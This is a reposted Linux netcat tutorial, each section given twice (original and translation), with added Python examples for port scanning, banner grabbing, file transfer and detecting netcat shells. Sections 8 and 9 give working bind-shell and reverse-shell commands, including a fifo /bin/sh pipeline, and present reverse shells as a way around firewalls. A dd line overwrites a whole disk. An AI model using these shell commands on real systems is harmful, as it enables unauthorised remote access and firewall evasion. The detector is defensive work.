Linux ncat command

netcat is the Swiss Army knife of network tools: it can read and write data across the network over TCP and UDP. Combined with other tools and with redirection, you can use it in scripts in many ways. What the netcat command can accomplish is surprising.

What netcat does is establish a connection between two computers and return two data streams; what you can do after that is limited only by your imagination. You can set up a server, transfer files, chat with friends, stream media, or use it as a standalone client for other protocols.

Below are some examples of using netcat.

[A(172.31.100.7) B(172.31.100.23)]

 

Linux netcat command examples

1. Port scanning

Port scanning is done by system admins and hackers to find the open ports on some machine. It helps them to identify the vulnerabilities in the system.

$nc -z -v -n 172.31.100.7 21-25

It can work in both TCP and UDP mode; the default is TCP mode, and to change to UDP use the -u option.

The z option tells netcat to use zero I/O, i.e. the connection is closed as soon as it opens and no actual data exchange takes place.
The v option is used for verbose output.
The n option tells netcat not to use a DNS lookup for the address.

This command will print all the open ports between 21 and 25.

A banner is the text a service sends when you connect to it. Banners are very useful when you are trying to find vulnerabilities in a system, as they identify the type and version of the service. NOTE: not all services send a banner.
Once you have found the open ports you can easily grab the service banner by connecting to them using netcat.

$ nc -v 172.31.100.7 21

The Linux netcat command will connect to open port 21 and will print the banner of the service running on that port.
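As an added illustration (not code from the original article), the zero-I/O probe behind -z and the banner grab, done with Python sockets against a constructed localhost listener that plays the part of the FTP service on port 21; the banner text, port and function names are assumptions for this example:

```python
import socket
import threading

CONSTRUCTED_BANNER = b"220 example-ftp ready\r\n"  # constructed stand-in for an FTP greeting


def start_banner_listener(banner=CONSTRUCTED_BANNER):
    """Listen on an ephemeral 127.0.0.1 port and send `banner` to each client.
    Returns the port; the serving thread is a daemon so it dies with the process."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            conn, _ = srv.accept()
            try:
                conn.sendall(banner)
            except OSError:
                pass  # the client closed at once, as a zero-I/O scan does
            finally:
                conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


def is_open(host, port, timeout=1.0):
    """Zero-I/O probe like `nc -z`: connect, then close without sending anything."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, unreachable or timed out
        return False


def scan_ports(host, first, last):
    """Open ports in first..last, like `nc -z -v -n host first-last`."""
    return [p for p in range(first, last + 1) if is_open(host, p)]


def grab_banner(host, port, timeout=2.0):
    """Connect like `nc -v host port` and return whatever the service says first."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return s.recv(1024).decode(errors="replace").strip()
```

Run `p = start_banner_listener()` and then `scan_ports("127.0.0.1", p, p + 1)` and `grab_banner("127.0.0.1", p)` to see the two steps the article performs with `nc -z` and `nc -v`.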

Translator's version

Linux netcat command examples:

1. Port scanning

Port scanning is often used by system administrators and hackers to discover the open ports on some machine, helping them identify vulnerabilities in the system.

$nc -z -v -n 172.31.100.7 21-25
It can run in TCP or UDP mode; the default is TCP, and the -u option switches to UDP.

The z option tells netcat to use zero I/O: close the connection as soon as it succeeds, with no data exchange (thanks to @jxing for the pointer)

The v option means verbose (translator's note: i.e. detailed output)

The n option tells netcat not to use DNS to reverse-resolve the IP address into a domain name

This command prints all open ports from 21 to 25. A banner is a text message that the service you connect to sends you. When you are trying to identify vulnerabilities or the type and version of a service, the banner information is very useful. However, not every service sends a banner.

Once you have found the open ports, you can easily connect to the services with netcat and grab their banners.

$ nc -v 172.31.100.7 21
The netcat command connects to open port 21 and prints the banner of the service running on that port.

 

2. Chat Server

If you want to chat with your friend there are numerous software and messenger services available at your disposal. But what if you do not have that luxury anymore, like inside your computer lab where all outside connections are restricted: how will you communicate with your friend who is sitting in the next room? Don't worry my friend, because netcat has a solution for you: just create a chat server on a predetermined port and he can connect to you.

Server

$nc -l 1567

The Linux netcat command starts a TCP server on port 1567 with stdout and stdin as the input/output streams, i.e. the output is displayed in the shell and input is read from the shell.

Client

$nc 172.31.100.7 1567

After this whatever you type on machine B will appear on A and vice-versa.

Translator's version

Chat Server

Suppose you want to chat with your friend; there is plenty of software and messaging services available to you. But if you don't have that luxury, for example you are in a computer lab where all outbound connections are restricted, how do you communicate with the friend sitting in the next room all day? Don't worry, netcat offers a way: you only need to create a chat server on a predetermined port, and he can then contact you.

Server

$nc -l 1567

The netcat command starts a TCP server on port 1567; all standard output and input go through that port. Output and input are both shown in this shell.

Client

$nc 172.31.100.7 1567
Whatever you type on machine B will appear on machine A.

 

3. File transfer

Most of the time we are trying to transfer a file over the network and stumble upon the problem of which tool to use. There are again numerous methods available like FTP, SCP, SMB etc. But is it really worth the effort to install and configure such complicated software and create a server on your machine when you only need to transfer one file, and only once?

Suppose you want to transfer a file "file.txt" from A to B.
Either one can be server or client; let's make A the server and B the client.

Server

$nc -l 1567 < file.txt

Client

$nc -n 172.31.100.7 1567 > file.txt

Here we have created a server at A and redirected the netcat input from the file file.txt, so when any connection is successful netcat sends the content of the file.

Again, at the client we have redirected the output of netcat to file.txt. When B connects to A, A sends the file content and B saves that content to the file file.txt.

It is not necessary to make the source of the file the server; we can work in the opposite order also. In the case below we are sending the file from B to A, but the server is created at B. This time we only need to redirect the output of netcat at A to the file and the input at B from the file.

B as server
Server

$nc -l 1567 > file.txt

Client

$nc 172.31.100.23 1567 < file.txt
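An added example (not from the original article): the same listen-and-redirect pattern in Python over 127.0.0.1, with the check netcat itself never does, a SHA-256 digest compared on both ends so a truncated or altered transfer is rejected instead of silently saved as file.txt. The helper names and the sample payload are assumptions for this example:

```python
import hashlib
import socket
import threading


def sha256_of(data):
    return hashlib.sha256(data).hexdigest()


def free_port():
    """Pick an unused 127.0.0.1 port (the article hard-codes 1567)."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def serve_file(data, port):
    """Like `nc -l <port> < file.txt`: accept one client, stream `data`, close.
    Returns the SHA-256 the sender tells the receiver out of band (e.g. via sha256sum)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)

    def one_shot():
        conn, _ = srv.accept()
        with conn:
            conn.sendall(data)
            conn.shutdown(socket.SHUT_WR)  # EOF tells the receiver the file is complete
        srv.close()

    threading.Thread(target=one_shot, daemon=True).start()
    return sha256_of(data)


def fetch_file(host, port, expected_sha256):
    """Like `nc host port > file.txt`, plus the check netcat lacks: verify the
    digest before trusting the bytes. Raises ValueError on a mismatch."""
    chunks = []
    with socket.create_connection((host, port), timeout=5) as s:
        while True:
            chunk = s.recv(65536)
            if not chunk:              # peer closed: transfer finished
                break
            chunks.append(chunk)
    received = b"".join(chunks)
    if sha256_of(received) != expected_sha256:
        raise ValueError("digest mismatch: transfer truncated or altered in transit")
    return received
```

Call `serve_file(open("file.txt", "rb").read(), free_port())` on the sending side and `fetch_file(host, port, digest)` on the receiving side; netcat's plain redirection gives you the bytes but not the digest check.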

 

Translator's version

3. File transfer

Most of the time we are trying to transfer files over the network or with other tools. There are many methods, such as FTP, SCP, SMB and so on, but when you only need to transfer a file temporarily or once, is it really worth wasting time installing and configuring a piece of software on your machine? Suppose you want to transfer a file file.txt from A to B. Either A or B can act as server or client; below, let A be the server and B the client.

Server

$nc -l 1567 < file.txt
Client
$nc -n 172.31.100.7 1567 > file.txt
Here we created a server on A and redirected netcat's input from the file file.txt, so when anything connects successfully to that port, netcat sends the contents of the file.

On the client we redirect the output to file.txt; when B connects to A, A sends the file contents and B saves them to file.txt.

It is not necessary to make the file source the server; we can also use it the other way round. As below, we send the file from B to A, but the server is created on B; this time we only need to redirect netcat's output on A and redirect B's input from the file.

B as Server

Server

$nc -l 1567 > file.txt

Client

$nc 172.31.100.23 1567 < file.txt

4. Directory transfer

Sending a file is easy, but what if we want to send more than one file, or a whole directory? It's easy: just use the archive tool tar to archive the files first and then send this archive.

Suppose you want to transfer a directory over the network from A to B.

Server

$tar -cvf - dir_name | nc -l 1567

Client

$nc -n 172.31.100.7 1567 | tar -xvf -

Here at server A we are creating the tar archive and redirecting its output to standard output with -. Then we are piping it to netcat, which sends it over the network.

At the client we are just downloading the archive from the server using netcat and piping its output to the tar tool to extract the files.

Want to conserve bandwidth by compressing the archive? We can use bzip2 or another tool suited to the content of the files.

Server

$tar -cvf - dir_name | bzip2 -z | nc -l 1567

Compress the archive using the bzip2 utility.

Client

$nc -n 172.31.100.7 1567 | bzip2 -d |tar -xvf -

Decompress the archive using the bzip2 utility.

Translator's version

4. Directory transfer

Sending one file is easy, but if we want to send multiple files, or a whole directory, it is just as easy: simply use the archiving tool tar, then send the archive.

Suppose you want to transfer a directory over the network from A to B.

Server

$tar -cvf - dir_name | nc -l 1567

Client

$nc -n 172.31.100.7 1567 | tar -xvf -
Here on server A we create a tar archive and redirect it to the console via -, then pipe it to netcat, which sends it over the network.

On the client we download the archive through the netcat pipe and then unpack it.

If you want to save bandwidth when transferring the archive, we can compress it with bzip2 or another tool.

Server

$tar -cvf - dir_name | bzip2 -z | nc -l 1567

Compress with bzip2

Client

$nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -
Decompress with bzip2

 

5. Encrypt your data when sending over the network

If you are worried about the security of data being sent over the network you can encrypt your data before sending using some tool like mcrypt.

Server

$nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt

Here mcrypt runs with -d, so it decrypts the data received from netcat and writes the plaintext to file.txt.

Client

$mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567

Here mcrypt encrypts file.txt and netcat sends the ciphertext. Note that in this example the side labelled Client is the one listening (nc -l), and the side labelled Server connects to it.
Both of the above commands will prompt for a password; make sure to use the same password on both.

Here we have used mcrypt for encryption, but any tool can be used. Note that the ECB mode selected with -m ecb encrypts identical plaintext blocks to identical ciphertext blocks and adds no integrity check, so a tool that offers an authenticated mode is a better choice today.

Translator's version

5. Encrypt the data you send over the network

If you are worried about the security of the data you send over the network, you can encrypt your data before sending it with a tool such as mcrypt.

Server

$nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt
Here mcrypt runs with -d, so it decrypts the data received from netcat and writes it to file.txt.

Client

$mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567
Here mcrypt encrypts file.txt and netcat sends the ciphertext.

Both of the above commands prompt for a password; make sure both ends use the same password.

Here we used mcrypt for encryption, but any other encryption tool can be used.

 

6. Stream a video

Not the best method to stream but if the server doesn’t have the specific tools, then with netcat we still have hope.

Server

$cat video.avi | nc -l 1567

Here we are just reading the video file and redirecting its output to netcat.
Client

$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here we are reading the data from the socket and redirecting it to mplayer.

Translator's version

6. Streaming a video

Although it is not the best way to produce a video stream, if the server doesn't have the specific tools, with netcat we still have hope of getting it done.

Server

$cat video.avi | nc -l 1567
Here we just read from a video file and redirect the output to netcat.

Client

$nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here we read the data from the socket and redirect it to mplayer.

 

7. Cloning a device

If you have just installed and configured a Linux machine and have to do the same to another machine too, and do not want to do the configuration again: there is no need to repeat the process, just boot the other machine from a bootable pen drive and clone your machine.

Cloning a Linux PC is very simple. Suppose your system disk is /dev/sda
Server

$dd if=/dev/sda | nc -l 1567

Client

$nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd is a tool which reads the raw data from the disk; we are just redirecting its output stream through a netcat server to the other machine and writing it to the disk. It will copy everything, along with the partition table. But if we have already done the partitioning and need to move only the root partition, we can change sda to sda1, sda2 etc. depending on where our root is installed.

Translator's version

7. Cloning a device

If you have already installed and configured one Linux machine and need to repeat the same operations on other machines, and you don't want to do the configuration again, there is no need to repeat the installation and configuration process; just boot the other machine from a bootable USB stick and clone your machine.

Cloning a Linux PC is simple. Suppose your system is on disk /dev/sda

Server

$dd if=/dev/sda | nc -l 1567
Client
$nc -n 172.31.100.7 1567 | dd of=/dev/sda
dd is a tool that reads raw data from a disk; we redirect its output stream through a netcat server to the other machine and write it to the disk. It copies everything along with the partition table. But if we have already partitioned and only need to clone the root partition, we can change sda to sda1, sda2, etc. depending on where our root partition is.

 

8. Opening a shell

We have used remote shells via telnet and ssh, but what if they are not installed and we do not have permission to install them? Then we can create a remote shell using netcat as well.

If your netcat supports the -c and -e options (traditional netcat)
Server

$nc -l 1567 -e /bin/bash -i

Client

$nc 172.31.100.7 1567

Here we have created a netcat server and instructed it to run the /bin/bash command when a connection is successful.

If netcat doesn't support the -c or -e options (openbsd netcat) we can still create a remote shell.
Server

$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here we have created a fifo. Then we pipe the content of this fifo file to a shell; 2>&1 redirects stderr to the same place as stdout, which is piped to the netcat server running on port 1567. Finally, the output of netcat is redirected back into the fifo file.

Explanation:

The input received from network is written to fifo file.

The fifo file is read by the cat command and its content is sent to the sh command.

The sh command processes the received input and writes the result back to netcat.

Netcat sends the output over the network to the client.

All this is possible because the pipe causes the commands to run in parallel. The fifo file is used instead of a regular file because a fifo makes the read wait, whereas with an ordinary file the cat command would have ended as soon as it started reading an empty file.

At the client it is just as simple as connecting to the server.
Client

$nc -n 172.31.100.7 1567

And you will get a shell prompt at the client.
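To see the difference the fifo makes, here is an added example (not from the original article) that reads an empty regular file and then a fifo with a delayed writer, the writer thread standing in for the netcat process that feeds the fifo; the file names, payload and function names are constructed for this example:

```python
import os
import tempfile
import threading
import time


def read_empty_regular_file(path):
    """Stand-in for `cat /tmp/regular_file`: an empty file yields EOF at once."""
    open(path, "wb").close()           # create it empty
    with open(path, "rb") as f:
        return f.read()                # b"" -> cat would exit immediately


def read_fifo_with_late_writer(path, payload, delay=0.2):
    """Stand-in for `cat /tmp/tmp_fifo` while netcat writes into the FIFO later.
    Returns (data_read, seconds_waited): the read waits for the writer."""
    os.mkfifo(path)

    def late_writer():                 # plays the part of `nc ... > /tmp/tmp_fifo`
        time.sleep(delay)
        with open(path, "wb") as w:
            w.write(payload)

    threading.Thread(target=late_writer, daemon=True).start()
    start = time.monotonic()
    with open(path, "rb") as r:        # open() blocks until a writer opens the FIFO
        data = r.read()                # read() returns once the writer closes it
    return data, time.monotonic() - start


def demo():
    """Run both cases in a temp dir; returns (regular_bytes, fifo_bytes, waited)."""
    with tempfile.TemporaryDirectory() as d:
        regular = read_empty_regular_file(os.path.join(d, "regular"))
        data, waited = read_fifo_with_late_writer(os.path.join(d, "tmp_fifo"), b"hello\n")
    return regular, data, waited
```

`demo()` returns an empty result for the regular file immediately and the payload for the fifo only after the writer showed up, which is exactly why `cat /tmp/tmp_fifo | /bin/sh -i` keeps the shell alive.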

Translator's version

8. Opening a shell

We have used remote shells with telnet and ssh, but if those two commands are not installed and we have no permission to install them, we can also create a remote shell with netcat.

Suppose your netcat supports the -c and -e options (the default netcat)

Server

$nc -l 1567 -e /bin/bash -i
Client
$nc 172.31.100.7 1567
Here we created a netcat server and told it to execute /bin/bash when the connection succeeds

If netcat does not support the -c or -e options (openbsd netcat), we can still create a remote shell

Server

$mkfifo /tmp/tmp_fifo
$cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
Here we created a fifo file, then used a pipe to direct the contents of this fifo to the shell; 2>&1 is used to redirect standard error to standard output, which is then piped to netcat running on port 1567. Finally, we redirect netcat's output to the fifo file.

Explanation:

The input received from the network is written to the fifo file

The cat command reads the fifo file and sends its contents to the sh command

The sh process receives the input and writes the result back to netcat.

netcat sends the output over the network to the client

The reason this works is that the pipe makes the commands run in parallel; the fifo file is used instead of a regular file because a fifo makes the read wait, whereas with an ordinary file the cat command would finish as soon as it started reading an empty file.

On the client, simply connect to the server

Client

$nc -n 172.31.100.7 1567
You will get a shell prompt on the client

 

9. Reverse Shell

Reverse shells are shells opened at the client side. They are so named because, unlike other configurations, here the server is using the service provided by the client.

Server

$nc -l 1567

At the client side simply tell netcat to execute the shell when connection is complete.

Client

$nc 172.31.100.7 1567 -e /bin/bash

Now what is so special about a reverse shell?
Reverse shells are often used to bypass firewall restrictions such as blocked inbound connections. For example, I have a private IP address of 172.31.100.7 and I connect to the outside network through a proxy server. If I want to access a shell on this machine from outside the network, say from 1.2.3.4, then I'll use a reverse shell for this purpose.
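From the defender's side, an added example (not from the original article) that flags the netcat shell invocations shown in sections 8 and 9 in process-start logs while leaving the plain file-transfer commands alone; the log line format, host names and sample lines are constructed for this example, so adapt the `cmd='...'` parser to whatever your auditd or EDR export looks like:

```python
import re
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh"}


def netcat_shell_findings(cmdline):
    """Reasons a command line looks like a netcat bind/reverse shell ([] if none)."""
    reasons = []
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return ["unparseable command line"]
    segments, cur = [], []
    for tok in argv:                       # split a pipeline on '|'
        if tok == "|":
            segments.append(cur)
            cur = []
        else:
            cur.append(tok)
    segments.append(cur)
    saw_nc = saw_shell = False
    for seg in segments:
        if not seg:
            continue
        prog = seg[0].rsplit("/", 1)[-1]   # basename of the program
        if prog in NETCAT_NAMES:
            saw_nc = True
            for i in range(1, len(seg) - 1):
                if seg[i] in ("-e", "-c") and seg[i + 1].rsplit("/", 1)[-1] in SHELLS:
                    reasons.append(f"netcat executes a shell via {seg[i]} {seg[i + 1]}")
        elif prog in SHELLS and "-i" in seg:
            saw_shell = True               # `/bin/sh -i` in the fifo pipeline
    if saw_nc and saw_shell:
        reasons.append("interactive shell piped through netcat (fifo pattern)")
    return reasons


CONSTRUCTED_LOG = [  # constructed sample lines, not real telemetry
    "host=lab-01 uid=1000 cmd='nc -l 1567 -e /bin/bash -i'",
    "host=lab-02 uid=1000 cmd='nc 172.31.100.7 1567 -e /bin/bash'",
    "host=lab-02 uid=1000 cmd='cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567'",
    "host=lab-03 uid=1000 cmd='nc -n 172.31.100.7 1567'",
]


def scan_log(lines):
    """Return [(line, reasons)] for every log line that matches a shell pattern."""
    hits = []
    for line in lines:
        m = re.search(r"cmd='([^']*)'", line)
        reasons = netcat_shell_findings(m.group(1)) if m else []
        if reasons:
            hits.append((line, reasons))
    return hits
```

`scan_log(CONSTRUCTED_LOG)` reports the first three lines (bind shell, reverse shell, fifo pipeline) and ignores the last one, which is just the file-transfer client from section 3.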

Translator's version

Reverse shell

A reverse shell is a shell opened on the client side. It is so named because, unlike other configurations, here the server uses a service provided by the client.

Server

$nc -l 1567
On the client, simply tell netcat to execute the shell once the connection completes.

Client

$nc 172.31.100.7 1567 -e /bin/bash
Now, what is special about a reverse shell?
A reverse shell is often used to bypass firewall restrictions such as blocked inbound connections. For example, I have a private IP address 172.31.100.7 and connect to the outside network through a proxy server. If I want to access a shell on this machine from outside the network, say from 1.2.3.4, then I would use a reverse shell for that purpose.

Reposted from: https://www.oschina.net/translate/linux-netcat-command?cmp
